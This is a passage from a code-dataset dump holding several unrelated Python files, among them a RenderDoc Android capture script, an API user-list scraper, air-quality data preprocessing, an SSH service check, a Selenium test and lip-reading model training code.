running on {ident}\")\n # raise RuntimeError(f\"{name} already has a program running on {ident}\")\n\n while True:\n try:\n # Let's try to connect\n result, remote = rd.CreateRemoteServerConnection(url)\n\n if result == rd.ResultCode.NetworkIOFailed and protocol is not None:\n # If there's just no I/O, most likely the server is not running. If we have\n # a protocol, we can try to start the remote server\n logging.info(\"Couldn't connect to remote server, trying to start it\")\n\n result = protocol.StartRemoteServer(url)\n\n if result != rd.ResultCode.Succeeded:\n raise RuntimeError(\n f\"Couldn't launch remote server, got error {str(result)}\"\n )\n\n break\n\n except RuntimeError as ex:\n logging.warn(f\"Error on connection: {ex}\")\n logging.info(\"Try to connect again\")\n\n # We now have a remote connection. This works regardless of whether it's a device\n # with a protocol or not. In fact we are done with the protocol at this point\n logging.info(\"Got connection to remote server\")\n protocol = None\n\n # list_executables(remote)\n\n # Select your executable, perhaps hardcoded or browsing using the above\n # functions\n pkg_name = os.environ[\"PKG_NAME\"]\n\n exe = os.environ.get(\"START_ACTIVITY\")\n if not exe:\n exe = get_main_activity(pkg_name)\n\n workingDir = \"\"\n cmdLine = \"\"\n env = []\n opts = rd.GetDefaultCaptureOptions()\n\n logging.info(f\"Running {exe}\")\n\n result = remote.ExecuteAndInject(exe, workingDir, cmdLine, env, opts)\n\n if result.result != rd.ResultCode.Succeeded:\n remote.ShutdownServerAndConnection()\n raise RuntimeError(f\"Couldn't launch {exe}, got error {str(result.result)}\")\n\n # Spin up a thread to keep the remote server connection alive while we make a capture,\n # as it will time out after 5 seconds of inactivity\n def ping_remote(remote, kill):\n success = True\n while success and not kill.is_set():\n success = remote.Ping()\n time.sleep(1)\n\n kill = threading.Event()\n ping_thread = threading.Thread(target=ping_remote, args=(remote, kill))\n ping_thread.start()\n\n # Create target control connection\n target = rd.CreateTargetControl(url, result.ident, \"remote_capture.py\", True)\n\n if target is None:\n kill.set()\n ping_thread.join()\n remote.ShutdownServerAndConnection()\n raise RuntimeError(f\"Couldn't connect to target control for {exe}\")\n\n logging.info(\"Connected - waiting for desired capture\")\n\n # TODO: Wait for the capture condition we want\n # capture_condition()\n\n logging.info(\"Wait for 15 seconds\")\n time.sleep(15)\n\n logging.info(\"Triggering capture\")\n\n target.TriggerCapture(1)\n\n # Pump messages, keep waiting until we get a capture message. Time out after 30 seconds\n msg = None\n start = time.clock()\n while msg is None or msg.type != rd.TargetControlMessageType.NewCapture:\n msg = target.ReceiveMessage(None)\n\n if time.clock() - start > 30:\n break\n\n # Close the target connection, we're done either way\n target.Shutdown()\n target = None\n\n # Stop the background ping thread\n kill.set()\n ping_thread.join()\n\n # If we didn't get a capture, error now\n if msg.type != rd.TargetControlMessageType.NewCapture:\n remote.ShutdownServerAndConnection()\n raise RuntimeError(\n \"Didn't get new capture notification after triggering capture\"\n )\n\n cap_path = msg.newCapture.path\n cap_id = msg.newCapture.captureId\n\n logging.info(\n f\"Got new capture at {cap_path} which is frame {msg.newCapture.frameNumber} with {msg.newCapture.api}\"\n )\n\n # We could save the capture locally\n local_file = os.path.join(\n get_home_path(),\n \"Desktop\",\n f\"{pkg_name}-{get_device_name()}-{get_date_str()}.rdc\",\n )\n logging.info(f\"Save capture to {local_file}\")\n remote.CopyCaptureFromRemote(\n cap_path,\n local_file,\n None,\n )\n\n\nsetup_logger()\nmain()\n","sub_path":"scripts/r/rdoc/capture_renderdoc_android.py","file_name":"capture_renderdoc_android.py","file_ext":"py","file_size_in_byte":6784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173537925","text":"from loguru import logger\n\nfrom utils import request, run_func, mongo\nfrom config import ACCESS_TOKEN, RUN_SIGN\n\n\n@run_func()\ndef writer(row: dict or list):\n if isinstance(row, dict):\n row.update({'times': f'{RUN_SIGN}'})\n elif isinstance(row, list):\n [x.update({'times': f'{RUN_SIGN}'}) for x in row]\n\n mongo.insert(row, 'kaiman')\n\n\n@run_func()\ndef auto_list():\n uri = 'https://kaiman.tradedge.cn/api/user/user_data/list'\n header = {\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 MicroMessenger/7.0.9.501 NetType/WIFI MiniProgramEnv/Windows WindowsWechat',\n 'auth-token': ACCESS_TOKEN,\n 'content-type': 'application/json',\n # 'Referer': 'https://servicewechat.com/wx2fc2b286963f2cff/1/page-frame.html',\n 'Accept-Encoding': 'gzip, deflate, br'\n }\n\n user_list = []\n\n data = {'keyword': '', 'nextKey': '', 'pageSize': '200'}\n resp = request(uri, header, data=data, json=True)\n\n while True:\n for user in resp.get('data').get('list'):\n user_id = user.get('userId')\n if user_id not in user_list:\n user_list.append(user_id)\n writer(user)\n else:\n logger.info(f'重复 - {user_id}')\n # writer(resp.get('data').get('list'))\n\n data['nextKey'] = resp.get('data').get('nextKey')\n resp = request(uri, header, data=data, json=True)\n\n\nif __name__ == '__main__':\n auto_list()\n","sub_path":"now/kaiman/spider_kaiman.py","file_name":"spider_kaiman.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"525872241","text":"import sys\nfrom pathlib import Path\nhome = str(Path.home())\nsys.path.insert(0, home+'/MasterThesis/')\n\n##\n\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nfrom datetime import timedelta\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\n\nfrom Preprocessing.Point import Point\nfrom Preprocessing.Coord import Coord\nfrom Preprocessing.Bounding_box import Bounding_box\n\n##\n\ndef convert_cardial_to_angular(cardinal_values):\n dict_cardinal = {\"N\": 360, \"NbE\": 11.25, \"NNE\": 22.5, \"NEbN\": 33.75, \"NE\": 45, \"NEbE\": 56.25,\n \"ENE\": 67.5, \"EbN\": 78.75, \"E\": 90, \"EbS\": 101.25, \"ESE\": 112.5, \"SEbE\": 123.75,\n \"SE\": 135, \"SEbS\": 146.25, \"SSE\": 157.5, \"SbE\": 168.75, \"S\": 180, \"SbW\": 191.25,\n \"SSW\": 202.5, \"SWbS\": 213.75, \"SW\": 225, \"SWbW\": 236.25, \"WSW\": 247.5, \"WbS\": 258.75,\n \"W\": 270, \"WbN\": 281.25, \"WNW\": 292.5, \"NWbW\": 303.75, \"NW\": 315, \"NWbN\": 326.25,\n \"NNW\": 337.5, \"NbW\": 348.75}\n angular_data = np.empty(len(cardinal_values))\n angular_data[:] = np.nan\n\n for i in range(len(cardinal_values)):\n if pd.isna(cardinal_values.iloc[i]) ==False:\n angular_data[i] = dict_cardinal[cardinal_values.iloc[i]]\n return pd.Series(angular_data)\n\n##\n\n# Read data from 12 monitoring stations\n\n'''\ndata_Aotizhongxin = pd.read_csv('data/data2013-2017/Aotizhongxin.csv')\ndata = pd.DataFrame(columns=data_Aotizhongxin.columns)\ndata = pd.concat([data, data_Aotizhongxin], axis=0)\ndata_changping = pd.read_csv('data/data2013-2017/Changping.csv')\ndata = pd.concat([data, data_changping], axis=0)\ndata_dingling = pd.read_csv('data/data2013-2017/Dingling.csv')\ndata = pd.concat([data, data_dingling], axis=0)\ndata_dongsi = pd.read_csv('data/data2013-2017/Dongsi.csv')\ndata = pd.concat([data, data_dongsi], axis=0)\ndata_guanyuan = pd.read_csv('data/data2013-2017/Guanyuan.csv')\ndata = pd.concat([data, data_guanyuan], axis=0)\ndata_gucheng = pd.read_csv('data/data2013-2017/Gucheng.csv')\ndata = pd.concat([data, data_gucheng], axis=0)\ndata_huairou = pd.read_csv('data/data2013-2017/Huairou.csv')\ndata = pd.concat([data, data_huairou], axis=0)\ndata_Nongzhanguan = pd.read_csv('data/data2013-2017/Nongzhanguan.csv')\ndata = pd.concat([data, data_Nongzhanguan], axis=0)\ndata_Shunyi = pd.read_csv('data/data2013-2017/Shunyi.csv')\ndata = pd.concat([data, data_Shunyi], axis=0)\ndata_Tiantan = pd.read_csv('data/data2013-2017/Tiantan.csv')\ndata = pd.concat([data, data_Tiantan], axis=0)\ndata_Wanliu = pd.read_csv('data/data2013-2017/Wanliu.csv')\ndata = pd.concat([data, data_Wanliu], axis=0)\ndata_Wanshouxigong = pd.read_csv('data/data2013-2017/Wanshouxigong.csv')\ndata = pd.concat([data, data_Wanshouxigong], axis=0)\n'''\n\n##\n# See correlation\n'''\ndata = data.reset_index(drop=True)\ncorr_data = data.corr()\n'''\n\n##\n''''\ndata = data.drop(columns=[\"No\"])\n'''\n##\n'''\nimport datetime\ndata.insert(0,'utc_time',0)\n'''\n##\n# Merge data from 12 monitoring stations\n'''\nfor i in range(len(data)):\n data.iloc[i,0] = datetime.datetime(data.iloc[i,1], data.iloc[i,2], data.iloc[i,3], data.iloc[i,4], 0)\n print(i)\ndata.to_csv(\"data/data2013-2017/data_2013_2017.csv\", index=False)\n'''\n##\n\n# PREPROCESSING\n\n# Read data\nprint(\"reading data ...\")\ndata = pd.read_csv(home+\"/MasterThesis/data/data2013-2017/data_2013_2017.csv\")\nbb_aq_stations = pd.read_csv(home+'/MasterThesis/data/data2013-2017/unlabeled_points.csv')\ncoord_aq_stations = pd.read_csv(home+'/MasterThesis/data/data2013-2017/stations.csv')\npoint_centroids = pd.read_csv(home+'/MasterThesis/data/centroids_aq_csv.csv')\n\n##\n\n# Convert string to datetime\ndata['utc_time'] = pd.to_datetime(data['utc_time'],utc=True)\n\n##\n\nstart_date = '2016-01-01 00:00:00+00:00'\nend_date = \"2016-12-31 23:00:00+00:00\"\n\nprint(\"Selecting data of the 2016 ...\")\n# Select data of 2016\n\ndata_2016 = data[data['year'] == 2016]\n\n##\n\nprint(\"NaN values: \")\n\n# Nan values\nnull_columns= data_2016.columns[data_2016.isna().any()]\naq_sum_null = data_2016[null_columns].isna().sum()\nprint(\"Nan values in pollutant data\")\nprint(aq_sum_null)\n\n##\n\nprint(\"Percentage of NaN data\")\n# Get percentage of missing values\npercen_pm25 = (aq_sum_null['PM2.5'] * 100) / len(data_2016)\npercen_pm10 = (aq_sum_null['PM10'] * 100) / len(data_2016)\npercen_SO2 = (aq_sum_null['SO2'] * 100) / len(data_2016)\npercen_NO2 = (aq_sum_null['NO2'] * 100) / len(data_2016)\npercen_CO = (aq_sum_null['CO'] * 100) / len(data_2016)\npercen_O3 = (aq_sum_null['O3'] * 100) / len(data_2016)\nprint(\"Percentage PM2.5 Nan values: \", percen_pm25)\nprint(\"Percentage PM10 Nan values: \", percen_pm10)\nprint(\"Percentage O3 Nan values: \", percen_SO2)\nprint(\"Percentage PM2.5 Nan values: \", percen_NO2)\nprint(\"Percentage PM10 Nan values: \", percen_CO)\nprint(\"Percentage O3 Nan values: \", percen_O3)\n\n##\n\ndata_2016 = data_2016.drop(columns=[\"year\", \"month\", \"day\", \"hour\", \"RAIN\"])\n\n##\n\nprint(\"Showing if there are missing dates in the data ...\")\nend_date = pd.to_datetime(data_2016.utc_time.max())\ncount = 0\n\nflag = False\nfor station in data_2016.station.unique():\n start_date = pd.to_datetime(data_2016.utc_time.min())\n while start_date <= end_date:\n if start_date != pd.to_datetime(data_2016.iloc[count, 0]):\n print(\"Missing date: \", start_date)\n flag = True\n start_date += timedelta(hours=1)\n count += 1\n\nif flag == False:\n print(\"There aren't missing dates in the data\")\n\n##\n\nselected_columns = ['station', 'utc_time', 'TEMP', 'PRES', 'DEWP', 'WSPM', 'wd', 'PM2.5']\ndata = data_2016[selected_columns].reset_index(drop=True)\n\n##\n\ndata['wd'] = convert_cardial_to_angular(data['wd'])\n\n##\n\nprint(\"Applying Linear Interpolation for NaN values ...\")\n# Apply linear interpolation for NaN values\ndata = data.assign(pm25=data['PM2.5'].interpolate(method='linear'))\ndata = data.assign(temp=data['TEMP'].interpolate(method='linear'))\ndata = data.assign(pres=data['PRES'].interpolate(method='linear'))\ndata = data.assign(dewp=data['DEWP'].interpolate(method='linear'))\ndata = data.assign(ws=data['WSPM'].interpolate(method='linear'))\ndata = data.assign(wd=data['wd'].interpolate(method='linear'))\n\n##\n\nselected_columns = ['station', 'utc_time', 'temp', 'pres', 'dewp', 'ws', 'wd', 'pm25']\ndata = data[selected_columns]\n\n##\n\nplt.figure(figsize = (10, 12))\nplt.plot(data[\"pm25\"])\n\n##\n# See heat map of missing values\nsns.heatmap(data.isnull(), cbar=False)\n\n##\n\n# Get neighbors for each monitoring station\nknn = 7\n\ndict_neighbors = {}\nfor i in range(len(coord_aq_stations)):\n other_stations = coord_aq_stations.drop(i, axis=0)\n coord = Coord(coord_aq_stations.iloc[i, 1], coord_aq_stations.iloc[i, 2])\n neighbors = coord.get_neighbors(other_stations, knn)\n dict_neighbors.update({str(coord_aq_stations.iloc[i, 0]): neighbors})\n\n##\n\nprint(\"Creating data processed\")\ndata_processed = pd.DataFrame(columns=['station','utc_time','latitude',\n 'longitude','temp','pres','dewp','wind_speed', 'wind_direction',\n 'pm25_1','pm25_2','pm25_3', 'pm25_4','pm25_5','pm25_6','pm25_7',\n 'dist_1','dist_2','dist_3','dist_4','dist_5','dist_6','dist_7',\n 'pm25'])\n\nwith tqdm(total=len(data)) as pbar:\n for i in range(len(data)):#lendata\n current_station = data.iloc[i, 0]\n current_time = data.iloc[i, 1]\n current_lon, current_lat = coord_aq_stations[coord_aq_stations['station'] == current_station].iloc[0, 1:3]\n temp = data.iloc[i, 2]\n pres = data.iloc[i, 3]\n dewp = data.iloc[i, 4]\n wind_speed = data.iloc[i, 5]\n wind_direction = data.iloc[i, 6]\n current_pm25 = data.iloc[i, -1]\n\n row = {'station': current_station, 'utc_time': current_time, 'latitude': current_lat, 'longitude': current_lon,\n 'temp': temp, 'pres': pres, 'dewp': dewp, 'wind_speed': wind_speed, 'wind_direction': wind_direction}\n\n # Get PM2.5 of neighbors\n neighbors = dict_neighbors[current_station]\n for k in range(knn):\n station, distance = neighbors['stations'][k], neighbors['distances'][k]\n mask = (data['station'] == station) & (data['utc_time'] == current_time)\n neighbor_pm25 = data.loc[mask].iloc[0, -1]\n row.update({'pm25_'+str(k+1): neighbor_pm25})\n row.update({'dist_'+str(k+1): distance})\n\n row.update({'pm25': current_pm25})\n data_processed = data_processed.append(row, ignore_index=True)\n pbar.update(1)\n\n##\n\ndata_processed.to_csv(home+\"/MasterThesis/data/data2013-2017/data_processed_uci.csv\", index=False)\nprint(\"Data created and saved as 'data_processed_uci.csv'\")\n\n##\n","sub_path":"Preprocessing/preprocessing_2013_2017.py","file_name":"preprocessing_2013_2017.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184965162","text":"\"\"\"Settings for storage app.\n\nUsed to provide s simple default configuration.\n\"\"\"\nfrom django.conf import settings\n\ndata_dir = getattr(settings, \"FLOW_EXECUTOR\", {}).get(\"DATA_DIR\", \"/some_path\")\ndefault_local_connector = \"local\"\ndefault_storage_connectors = {\n default_local_connector: {\n \"connector\": \"resolwe.storage.connectors.localconnector.LocalFilesystemConnector\",\n \"config\": {\"priority\": 0, \"path\": data_dir},\n },\n}\n\nSTORAGE_LOCAL_CONNECTOR = getattr(\n settings, \"STORAGE_LOCAL_CONNECTOR\", default_local_connector\n)\nSTORAGE_CONNECTORS = getattr(settings, \"STORAGE_CONNECTORS\", default_storage_connectors)\n","sub_path":"resolwe/storage/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382706035","text":"\"\"\"\nThis file is part of Linspector (https://linspector.org/)\nCopyright (c) 2013-2023 Johannes Findeisen . All Rights Reserved.\nSee LICENSE.\n\"\"\"\n\nimport os\nimport pprint\n\nimport paramiko\n\nfrom linspector.service import Service\n\n\ndef create(configuration, environment, log):\n return SSHService(configuration, environment, log)\n\n\nclass SSHService(Service):\n\n def execute(self, **kwargs):\n path = os.path.join(os.environ['HOME'], '.ssh', 'id_rsa')\n key = paramiko.RSAKey.from_private_key_file(path)\n\n client = paramiko.SSHClient()\n client.get_host_keys().add('hanez.org', 'ssh-rsa', key)\n pprint.pprint(client._host_keys)\n\n client.connect('hanez.org', username='hanez')\n\n # self.command.call() ist dann das:\n stdin, stdout, stderr = client.exec_command('ls')\n for line in stdout:\n print('... ' + line.strip('\\n'))\n client.close()\n","sub_path":"linspector/services/net/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78144775","text":"import time\r\n\r\ndef test_check_exists_by_css_selector(browser):\r\n\r\n link = f\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\r\n browser.get(link)\r\n time.sleep(30) \r\n button = len(browser.find_elements_by_css_selector('button.btn.btn-lg.btn-primary')) > 0\r\n\r\n assert button > 0, f\"No element: button\"\r\n\r\n","sub_path":"Step_3/test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283872034","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nimport pymongo\n\nimport collections\n\nfrom matplotlib import rcParams\nrcParams.update({'figure.autolayout': True})\n\ndef flatten(d, parent_key='', sep='_'):\n \"\"\"\n flatten nested Mongodb records\n \"\"\"\n items = []\n for k, v in d.items():\n new_key = parent_key + sep + k if parent_key else k\n if isinstance(v, collections.MutableMapping):\n items.extend(flatten(v, new_key, sep=sep).items())\n else:\n items.append((new_key, v))\n return dict(items)\n\nclient = pymongo.MongoClient()\ndb = client.lai\nresults = db.results\n\ndf = pd.DataFrame(list(map(flatten, results.find({'batch_size' : 20, 'window_size' : {'$gt' : 2}}))))\nfig, ax = plt.subplots()\n\nax.scatter(df['window_size'], df['overall_acc_avg'], color='red')\nax.set_ylabel('average accuracy\\n(across 20\\ntest chromosomes)', color='red',\n rotation='horizontal', horizontalalignment='right', multialignment='center')\n\nax2 = ax.twinx()\nax2.scatter(df['window_size'], df['time'] / 60, color='blue')\nax2.set_ylabel('runtime\\n(minutes)', color='blue',\n rotation='horizontal', horizontalalignment='left', multialignment='center')\n\nax.set_xlabel('window size')\nplt.title('window size vs. accuracy and runtime (using sliding windows)')\nplt.gcf().set_size_inches([9.4, 4.8])\n\nfig.savefig('results/sliding_windows/window_size_vs_accuracy_and_runtime')\n","sub_path":"bin/pythonScripts/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"30790565","text":"#!/usr/bin/env python\n\nimport Prediction as Pred\nfrom itertools import chain\nfrom Render import FigureCanvasPixbuf, drawHist, drawBar\nfrom os.path import basename\nfrom operator import itemgetter\nfrom multiprocessing import Process, Manager, Value\nfrom time import time\nfrom math import sqrt\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\nclass Model():\n def __init__(self):\n self.tst_inpt = [['','']]\n \n def _pred_part(self, i, partisi, wdw, hist, hmms, al_fst):\n train_seqs_part = []\n for e, train in enumerate(partisi):\n if e == i:\n test_seqs_part = train\n else:\n train_seqs_part += train\n traind_mdl, hmm = Pred.train(train_seqs_part, wdw, al_fst)\n pred_seqs, probs = Pred.predict(traind_mdl, test_seqs_part, wdw, al_fst)\n _, acc = Pred.test(pred_seqs, test_seqs_part)\n hmms.value += hmm\n hist += acc\n \n def _calc_yres(self, hist):\n res = []\n res.append(min(hist))\n res.append(max(hist))\n res.append(sum(hist) / len(hist))\n v = sum((i - res[2])**2 for i in hist) / (len(hist) - 1)\n res.append(sqrt(v))\n \n p = 0\n for i in hist:\n if res[2] - res[3] <= i <= res[2] + res[3]:\n p +=1 \n\n res.append(p / float(len(hist))) \n return res\n \n def _calc_ytot(self, res):\n s = []\n s.append(sum(res[k][0] for k in res))\n s.append(sum(res[k][1] for k in res))\n s.append(min(res[k][2] for k in res))\n s.append(max(res[k][3] for k in res))\n s.append(sum(res[k][4] for k in res) / len(res))\n s.append(sqrt(sum(res[k][5] ** 2 for k in res) / len(res)))\n s.append(sum(res[k][6] for k in res) / len(res))\n return s\n \n def _calc_wtot(self, wtot):\n s = []\n for i in range(7):\n s.append(sum(wtot[w][i] for w in wtot) / float(len(wtot)))\n \n return s\n \n def _draw_ytot(self, key, hist, al_fst, wdw, yres):\n hist_all = list(chain.from_iterable([hist[k] for k in hist]))\n al = 'Aligned' if al_fst else 'Unaligned'\n title = '%s (s = %d, %s)' % (key, wdw, al)\n \n return [drawHist(hist_all, title), drawBar(yres, title)]\n \n def _draw_tot(self, wtot, al_fst, key):\n al = 'Aligned' if al_fst else 'Unaligned'\n title = '%s (All Slicing Size, %s)' % (key, al)\n \n return drawBar(wtot, title)\n \n def _create_yres(self, key, manager, fsts, y, al_fst, wdw):\n train_input = Pred.inputTraining(fsts[y], fsts[y+1], al_fst)\n yres = [len(train_input)]\n partisi = Pred.partitioning(train_input) \n p = []\n hist = manager.list([])\n yres.append(Value('i', 0))\n \n for i in range(len(partisi)):\n arg = (i, partisi, wdw, hist, yres[1], al_fst)\n p.append(Process(target=self._pred_part, args=arg))\n p[i].start()\n \n for t in p:\n t.join()\n\n yres[1] = yres[1].value\n yres += self._calc_yres(hist)\n al = 'Aligned' if al_fst else 'Unaligned'\n title = '%s (s = %d, %s)' % (key, wdw, al)\n yres.append(drawHist(hist, title))\n \n return yres, hist\n \n def _create_ytot(self, fsts, yres, hist, al_fst, wdw):\n key = basename(fsts[0])[:-6] + '-' + basename(fsts[-1])[:-6]\n ytot = self._calc_ytot(yres)\n ytot.append(self._draw_ytot(key, hist, al_fst, wdw, yres))\n ytot.append(key)\n \n return ytot\n \n def _create_tot(self, fsts, wtot, al_fst):\n key = basename(fsts[0])[:-6] + '-' + basename(fsts[-1])[:-6]\n tot = self._calc_wtot(wtot)\n tot.append(self._draw_tot(wtot, al_fst, key))\n tot.append(key)\n \n return tot\n \n def inputTraining(self, train_fst, target_fst, win, alf):\n self.wdw = win\n self.al_fst = alf\n self.train_input = Pred.inputTraining(train_fst, target_fst, alf)\n \n return len(self.train_input)\n \n def train(self):\n self.traind_mdl, no = Pred.train(self.train_input, self.wdw, self.al_fst)\n \n return no\n \n def predict(self, test_seq):\n self.tst_inpt[0][0] = SeqRecord(Seq(test_seq))\n p = Pred.predict(self.traind_mdl, self.tst_inpt, self.wdw, self.al_fst)\n self.pred_seqs, self.probs = p[0], p[1]\n \n return self.pred_seqs[0], self.probs[0]\n \n def test(self, target_seq):\n self.tst_inpt[0][1] = SeqRecord(Seq(target_seq))\n self.aligned, self.acc = Pred.test(self.pred_seqs, self.tst_inpt)\n \n return self.aligned[0][0], self.aligned[0][1], self.acc[0] \n \n def validate(self, fasta, w, al_fst):\n fsts = sorted(fasta)\n wres, wtot, tot = {}, {}, []\n manager = Manager()\n \n for wdw in w:\n yres, ytot, hist = {}, [], {}\n \n for y in range(len(fsts[:-1])):\n key = basename(fsts[y])[:-6] + '-' + basename(fsts[y+1])[:-6]\n yres[key], hist[key] = self._create_yres(key, manager, fsts, y, al_fst, wdw)\n \n if len(hist) > 1:\n ytot = self._create_ytot(fsts, yres, hist, al_fst, wdw)\n \n wres[wdw], wtot[wdw] = yres, ytot\n \n if len(w) > 1:\n tot = self._create_tot(fsts, wtot, al_fst)\n \n return wres, wtot, tot\n\n def get_pred_seq(self):\n return self.pred_seqs[0]","sub_path":"src/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"253626358","text":"# BACKJOON #2851 <슈퍼 마리오>\n# https://www.acmicpc.net/problem/2851\n\narr = [int(input()) for i in range(10)]\nscore = 0\nfor n in arr:\n\ttemp = score + n\n\tif temp >= 100:\n\t\tif temp-100 > 100-score:\n\t\t\tprint(score)\n\t\telse: print(temp)\n\t\texit()\n\telse: score = temp\nprint(score)\n","sub_path":"Baekjoon/2851_SuperMario.py","file_name":"2851_SuperMario.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"69366337","text":"# encoding=utf-8\nimport sys\nfrom hyper_and_conf import hyper_param as hyperParam\nfrom hyper_and_conf import hyper_train, hyper_optimizer\nimport core_lip_main\nimport core_data_SRCandTGT\nfrom core_resnet import identity_block, conv_block\nfrom tensorflow.python.client import device_lib\n# from tensorflow.python.keras import initializers\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.python.keras import regularizers\nimport core_Transformer_model\nL2_WEIGHT_DECAY = 1e-4\nBATCH_NORM_DECAY = 0.9\nBATCH_NORM_EPSILON = 1e-5\nDATA_PATH = sys.path[0]\nSYS_PATH = sys.path[1]\n# TRAIN_PATH = '/home/vivalavida/massive_data/lip_reading_data/sentence_level_lrs2'\n# C = '/home/vivalavida/massive_data/lip_reading_data/sentence_level_lrs2/main'\nsrc_data_path = [DATA_PATH + \"/corpus/lip_corpus.txt\"]\n\ntgt_data_path = [DATA_PATH + \"/corpus/lip_corpus.txt\"]\n# TFRECORD = '/home/vivalavida/massive_data/lip_reading_TFRecord/tfrecord_word'\n# TFRECORD = '/home/vivalavida/massive_data/sentence_lip_data_tfrecord_train_v1'\nTFRECORD = '/home/vivalavida/massive_data/'\n# TFRECORD = '/home/wonderwall/data'\n\n# TFRECORD = '/home/vivalavida/massive_data/fc1'\n\n# TFRECORD = '/data'\n\n# TFRECORD = '/Users/barid/Documents/workspace/batch_data/'\n\n# PADDED_IMG = 150\n# PADDED_TEXT = 80\nPADDED_IMG = 50\nPADDED_TEXT = 1\n\n\ndef get_vgg(self):\n if tf.io.gfile.exists('pre_train/vgg16_pre_all'):\n vgg16 = tf.keras.models.load_model('pre_train/vgg16_pre_all')\n else:\n vgg16 = tf.keras.applications.vgg16.VGG16(\n include_top=True, weights='imagenet')\n return vgg16\n\n\ndef get_available_cpus():\n local_device_protos = device_lib.list_local_devices()\n return len([x.name for x in local_device_protos if x.device_type == 'CPU'])\n\n\ndef get_available_gpus():\n local_device_protos = device_lib.list_local_devices()\n return len([x.name for x in local_device_protos if x.device_type == 'GPU'])\n\n\ndef cpus_device():\n local_device_protos = device_lib.list_local_devices()\n return [x.name for x in local_device_protos if x.device_type == 'CPU']\n\n\ndef gpus_device():\n local_device_protos = device_lib.list_local_devices()\n return [x.name for x in local_device_protos if x.device_type == 'GPU']\n\n\ngpu = get_available_gpus()\nTRAIN_MODE = 'large' if gpu > 0 else 'test'\nhp = hyperParam.HyperParam(TRAIN_MODE, gpu=get_available_gpus())\nPAD_ID_int64 = tf.cast(hp.PAD_ID, tf.int64)\nPAD_ID_float32 = tf.cast(hp.PAD_ID, tf.float32)\n\ndata_manager = core_data_SRCandTGT.DatasetManager(\n src_data_path,\n tgt_data_path,\n batch_size=hp.batch_size,\n PAD_ID=hp.PAD_ID,\n EOS_ID=hp.EOS_ID,\n # shuffle=hp.data_shuffle,\n shuffle=hp.data_shuffle,\n max_length=hp.max_sequence_length,\n tfrecord_path=TFRECORD)\n\n# train_dataset, val_dataset, test_dataset = data_manager.prepare_data()\n\n\ndef get_hp():\n return hp\n\n\ndef backend_config():\n config = tf.compat.v1.ConfigProto()\n # config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1\n config.intra_op_parallelism_threads = 4\n config.inter_op_parallelism_threads = 4\n # # Don't pre-allocate memory; allocate as-needed\n config.gpu_options.allow_growth = True\n\n # Only allow a total of half the GPU memory to be allocated\n # config.gpu_options.per_process_gpu_memory_fraction = 0.999\n # config.allow_soft_placement = True\n\n return config\n\n\ndef input_fn(flag=\"TRAIN\"):\n if flag == \"VAL\":\n dataset = data_manager.get_raw_val_dataset()\n else:\n if flag == \"TEST\":\n dataset = data_manager.get_raw_test_dataset()\n else:\n if flag == \"TRAIN\":\n dataset = data_manager.get_raw_train_dataset()\n else:\n assert (\"data error\")\n return dataset\n\n\ndef map_data_for_feed_pertunated(x, y):\n return ((x, randomly_pertunate_input(y)), y)\n\n\ndef map_data_for_feed(x, y):\n return ((x, y), y)\n\n\ndef map_data_for_text(x):\n return ((x, x), x)\n\n\ndef randomly_pertunate_input(x):\n determinater = np.random.randint(10)\n if determinater > 3:\n return x\n else:\n index = np.random.randint(2, size=(1, 80))\n x = x * index\n return x\n\n\ndef pad_sample(dataset, batch_size):\n # dataset = dataset.shuffle(200000, reshuffle_each_iteration=True)\n dataset = dataset.padded_batch(\n hp.batch_size,\n (\n [PADDED_IMG, 32, 64, 3], # source vectors of unknown size\n [PADDED_TEXT]), # target vectors of unknown size\n drop_remainder=True)\n\n return dataset\n\n\ndef pad_text_sample(dataset, batch_size):\n # dataset = dataset.shuffle(200000, reshuffle_each_iteration=True)\n dataset = dataset.padded_batch(\n hp.batch_size,\n [120], # target vectors of unknown size\n drop_remainder=True)\n\n return dataset\n\n\ndef reshape_data(src, tgt):\n # return tf.reshape(src, [-1, 32, 64, 3]), tgt\n return tf.reshape(src, [-1, 32, 64, 3]) / 127.5 - 1.0, tgt\n\n\ndef map_data_for_val(src, tgt):\n return src, tgt\n\n\ndef train_Transformer_input():\n dataset = data_manager.get_text_train_dataset()\n # dataset = dataset.shuffle(100000)\n dataset = pad_text_sample(dataset, batch_size=hp.batch_size)\n\n dataset = dataset.map(map_data_for_text)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef train_input(seq2seq=True, pertunate=False):\n\n dataset = input_fn('TRAIN')\n # dataset = dataset.shuffle(100000)\n dataset = dataset.map(reshape_data)\n dataset = pad_sample(dataset, 